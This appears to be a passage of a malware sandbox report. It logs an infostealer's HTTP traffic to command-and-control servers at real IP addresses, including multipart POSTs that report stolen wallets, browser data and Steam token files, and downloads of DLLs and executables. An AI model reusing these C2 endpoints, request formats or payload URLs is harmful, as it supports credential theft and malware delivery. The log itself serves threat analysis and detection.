Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJDHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file"------GDHIIIIEHCFIECAKFHJD--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 2d 2d 0d 0a Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file"------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"wallets------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCAHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 2d 2d 0d 0a Data Ascii: ------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="message"files------IDGIJEGHDAECAKECAFCA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="message"ybncbhylepme------FIIDBKJJDGHDHJKEHJDB--
Source: global traffic HTTP traffic detected: GET /vjgg.exe HTTP/1.1Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /lnef.exe HTTP/1.1Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 2d 2d 0d 0a Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJJJDAAECGHDGDGCGHDB--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.126.10Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 147.45.126.10Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 43 38 33 32 35 45 38 45 42 39 32 39 32 35 33 38 32 31 39 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"3DC8325E8EB92925382193-a33c7340-61ca------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------DBFHDBGIEBFIIDGCBFBK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 147.45.126.10Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 38 63 36 38 38 38 32 63 65 61 32 30 39 38 61 38 37 37 32 65 65 39 31 34 66 31 39 34 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"c28c68882cea2098a8772ee914f19459------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="mode"1------AFHDAEGHDGDBGDGDAAFI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 147.45.126.10Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 38 63 36 38 38 38 32 63 65 61 32 30 39 38 61 38 37 37 32 65 65 39 31 34 66 31 39 34 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"c28c68882cea2098a8772ee914f19459------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="mode"2------AFHDAEGHDGDBGDGDAAFI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 147.45.126.10Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 38 63 36 38 38 38 32 63 65 61 32 30 39 38 61 38 37 37 32 65 65 39 31 34 66 31 39 34 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 66 31 30 39 33 61 61 37 65 65 62 61 66 37 35 35 32 30 33 61 30 30 33 37 30 65 32 32 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"c28c68882cea2098a8772ee914f19459------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build_id"4f1093aa7eebaf755203a00370e22375------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="mode"21------KJDAECAEBKJJJKEBKKJD--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIEHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 43 38 33 32 35 45 38 45 42 39 32 39 32 35 33 38 32 31 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 2d 2d 0d 0a Data Ascii: ------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="hwid"3DC8325E8EB92925382193------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="build"leva------CFBAFBFIEHIDBGDHCGIE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 63 64 61 30 65 62 66 37 36 37 33 31 31 61 66 30 34 62 33 39 37 65 65 61 31 33 62 33 64 31 30 61 36 32 35 65 38 36 38 65 39 66 32 66 64 38 65 35 34 37 36 61 66 37 66 37 31 64 32 38 31 62 63 34 62 66 37 65 62 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"73cda0ebf767311af04b397eea13b3d10a625e868e9f2fd8e5476af7f71d281bc4bf7eb5------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"browsers------DHCAAEBKEGHJKEBFHJDB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 63 64 61 30 65 62 66 37 36 37 33 31 31 61 66 30 34 62 33 39 37 65 65 61 31 33 62 33 64 31 30 61 36 32 35 65 38 36 38 65 39 66 32 66 64 38 65 35 34 37 36 61 66 37 66 37 31 64 32 38 31 62 63 34 62 66 37 65 62 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"73cda0ebf767311af04b397eea13b3d10a625e868e9f2fd8e5476af7f71d281bc4bf7eb5------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="message"plugins------AKJDGIEHCAEHIEBFBKKK--
